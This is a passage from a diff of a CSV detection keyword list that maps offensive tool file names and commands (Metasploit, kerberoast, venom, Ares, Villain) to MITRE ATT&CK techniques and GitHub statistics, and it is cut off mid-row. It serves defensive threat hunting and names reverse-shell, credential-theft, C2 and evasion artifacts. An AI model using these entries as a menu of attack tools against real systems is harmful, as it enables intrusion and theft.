@@ -7418,8 +7563,8 @@ "*AutoC2/Wireless.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" "*AutoC2/Wordlists*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" "*AutoCompletionHandlerC2ServerManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*autodiscover/brute.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" -"*autoexploit.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*autodiscover/brute.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*autoexploit.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*autokerberoast.ps1*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*autokerberoast_noMimikatz.ps1","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*autoKirbi2hashcat.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" 
@@ -7428,11 +7573,11 @@ "*AutoNSE*","offensive_tool_keyword","autonse","Massive NSE (Nmap Scripting Engine) AutoSploit and AutoScanner. The Nmap Scripting Engine (NSE) is one of Nmaps most powerful and flexible features. It allows users to write (and share) simple scripts (using the Lua programming language ) to automate a wide variety of networking tasks. Those scripts are executed in parallel with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap. or write their own to meet custom needs. For more informations https://nmap.org/book/man-nse.html","T1059.001 - T1059.003 - T1059.005 - T1059.006 - T1027 - T1064 - T1086 - T1085","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/m4ll0k/AutoNSE","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*autopwn*","offensive_tool_keyword","autopwn","tools for pentester. autopwn is designed to make a pentesters life easier and more consistent by allowing them to specify tools they would like to run against targets. without having to type them in a shell or write a script. 
This tool will probably be useful during certain exams as well..","T1583 - T1059 - T1216 - T1053 - T1027","TA0002 - TA0008 - TA0003","N/A","N/A","Exploitation tools","https://github.com/nccgroup/autopwn","1","1","N/A","N/A","4","375","102","2019-04-23T09:58:28Z","2015-02-23T08:18:01Z" "*AutoRDPwn*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*AutoSmuggle.csproj*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" -"*AutoSmuggle.exe*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" -"*AutoSmuggle.sln*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" -"*AutoSmuggle-master*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense 
Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" -"*autostart/ares.desktop*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*AutoSmuggle.csproj*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*AutoSmuggle.exe*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*AutoSmuggle.sln*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*AutoSmuggle-master*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*autostart/ares.desktop*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - 
TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*autoTGS_NtlmCrack.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*autotimeline *","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","0","N/A","N/A","2","119","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" "*autotimeline.py*","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","119","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" 
@@ -7443,32 +7588,32 @@ "*aux/persistence.rc","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*aux/privilege_escalation.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*aux/Start-Webserver.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*auxiliary/crawler*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*auxiliary/sqli/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*av_hips_executables.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*avast_memory_dump.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*auxiliary/crawler*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*auxiliary/sqli/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*av_hips_executables.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*avast_memory_dump.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*avet-master.zip*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" "*avflagged.exe*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","0","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*avrdude -c usbasp -p m328p -U flash:w:avr.hex*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*avred-main.zip*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible 
information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" -"*av-update-urls.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*avred-main.zip*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*av-update-urls.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" "*awesome-cve-poc*","offensive_tool_keyword","POC","list of poc exploitation for nown CVE","T1210 - T1583 - T1586 - T1589 - T1596","TA0002 - TA0011 - TA0007","N/A","N/A","Exploitation tools","https://github.com/qazbnm456/awesome-cve-poc","1","1","N/A","N/A","10","3159","741","2022-01-04T19:07:43Z","2017-02-02T06:43:14Z" -"*Awesome-Hacking*","offensive_tool_keyword","Awesome-Hacking","A collection of awesome lists for hackers. 
pentesters & security researchers.","T1566 - T1590 - T1204 - T1210 - T1212 - T1213","TA0002 - TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hack-with-Github/Awesome-Hacking","1","1","N/A","N/A","10","69633","8680","2023-08-08T10:17:21Z","2016-03-30T15:47:10Z" -"*Awesome-Hacking-Resources*","offensive_tool_keyword","Awesome-Hacking-Resources","A collection of hacking / penetration testing resources to make you better!","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Exploitation tools","https://github.com/vitalysim/Awesome-Hacking-Resources","1","1","N/A","N/A","10","13936","2049","2022-08-22T09:10:41Z","2017-10-10T19:09:18Z" -"*awesome-osint*","offensive_tool_keyword","awesome-osint","A curated list of amazingly awesome open source intelligence tools and resources. Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC). the term open refers to overt. publicly available sources (as opposed to covert or clandestine sources)","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/jivoi/awesome-osint","1","1","N/A","N/A","10","14087","2400","2023-09-19T11:25:43Z","2016-11-30T13:26:11Z" -"*awesome-pentest*","offensive_tool_keyword","awesome-pentest","A collection of awesome penetration testing and offensive cybersecurity resources.","T1200 - T1210 - T1213 - T1583 - T1589","TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/enaqx/awesome-pentest","1","1","N/A","N/A","10","19300","4317","2023-09-19T03:06:47Z","2014-08-03T23:13:53Z" -"*awesome-pentest-cheat-sheets*","offensive_tool_keyword","awesome-pentest-cheat-sheets","Collection of cheat sheets useful for pentesting","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation 
tools","https://github.com/coreb1t/awesome-pentest-cheat-sheets","1","0","N/A","N/A","10","3505","755","2023-08-04T12:41:53Z","2016-11-29T00:00:18Z" +"*Awesome-Hacking*","offensive_tool_keyword","Awesome-Hacking","A collection of awesome lists for hackers. pentesters & security researchers.","T1566 - T1590 - T1204 - T1210 - T1212 - T1213","TA0002 - TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hack-with-Github/Awesome-Hacking","1","1","N/A","N/A","10","69666","8680","2023-08-08T10:17:21Z","2016-03-30T15:47:10Z" +"*Awesome-Hacking-Resources*","offensive_tool_keyword","Awesome-Hacking-Resources","A collection of hacking / penetration testing resources to make you better!","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Exploitation tools","https://github.com/vitalysim/Awesome-Hacking-Resources","1","1","N/A","N/A","10","13938","2049","2022-08-22T09:10:41Z","2017-10-10T19:09:18Z" +"*awesome-osint*","offensive_tool_keyword","awesome-osint","A curated list of amazingly awesome open source intelligence tools and resources. Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC). the term open refers to overt. 
publicly available sources (as opposed to covert or clandestine sources)","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/jivoi/awesome-osint","1","1","N/A","N/A","10","14096","2404","2023-10-04T14:37:06Z","2016-11-30T13:26:11Z" +"*awesome-pentest*","offensive_tool_keyword","awesome-pentest","A collection of awesome penetration testing and offensive cybersecurity resources.","T1200 - T1210 - T1213 - T1583 - T1589","TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/enaqx/awesome-pentest","1","1","N/A","N/A","10","19309","4319","2023-09-19T03:06:47Z","2014-08-03T23:13:53Z" +"*awesome-pentest-cheat-sheets*","offensive_tool_keyword","awesome-pentest-cheat-sheets","Collection of cheat sheets useful for pentesting","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tools","https://github.com/coreb1t/awesome-pentest-cheat-sheets","1","0","N/A","N/A","10","3508","755","2023-08-04T12:41:53Z","2016-11-29T00:00:18Z" "*awesome-scapy*","offensive_tool_keyword","awesome-scapy","A Python tool and library for low level packet creation and manipulation","T1571 - T1596 - T1567 - T1569","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/secdev/awesome-scapy","1","1","N/A","N/A","2","148","29","2023-03-08T23:26:41Z","2020-02-04T12:17:35Z" "*awesome-static-analysis*","offensive_tool_keyword","awesome-static-analysis","This is a collection of static analysis tools and code quality checkers","T1064 - T1027 - T1029 - T1518","TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/codefactor-io/awesome-static-analysis","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*awesome-web-security*","offensive_tool_keyword","awesome-web-security","Curated list of Web Security materials and resources.Needless to say. most websites suffer from various types of bugs which may eventually lead to vulnerabilities. 
Why would this happen so often? There can be many factors involved including misconfiguration. shortage of engineers' security skills. etc. To combat this. here is a curated list of Web Security materials and resources for learning cutting edge penetration techniques. and I highly encourage you to read this article So you want to be a web security researcher? first","T1190 - T1191 - T1192 - T1210 - T1213","TA0002 - TA0003 - TA0007","N/A","N/A","Web Attacks","https://github.com/qazbnm456/awesome-web-security","1","1","N/A","N/A","10","10120","1611","2023-09-07T06:54:29Z","2017-01-29T16:50:21Z" +"*awesome-web-security*","offensive_tool_keyword","awesome-web-security","Curated list of Web Security materials and resources.Needless to say. most websites suffer from various types of bugs which may eventually lead to vulnerabilities. Why would this happen so often? There can be many factors involved including misconfiguration. shortage of engineers' security skills. etc. To combat this. here is a curated list of Web Security materials and resources for learning cutting edge penetration techniques. and I highly encourage you to read this article So you want to be a web security researcher? 
first","T1190 - T1191 - T1192 - T1210 - T1213","TA0002 - TA0003 - TA0007","N/A","N/A","Web Attacks","https://github.com/qazbnm456/awesome-web-security","1","1","N/A","N/A","10","10124","1610","2023-09-07T06:54:29Z","2017-01-29T16:50:21Z" "*awesome-windows-domain-hardening*","offensive_tool_keyword","awesome-windows-domain-hardening","A curated list of awesome Security Hardening techniques for Windows with additional links to exploitation tools","T1563 - T1059 - T1547 - T1057 - T1574","TA0002 - TA0008 - TA0003 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/PaulSec/awesome-windows-domain-hardening","1","0","N/A","N/A","10","1665","280","2020-01-07T19:56:18Z","2017-02-19T19:20:38Z" -"*awk_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 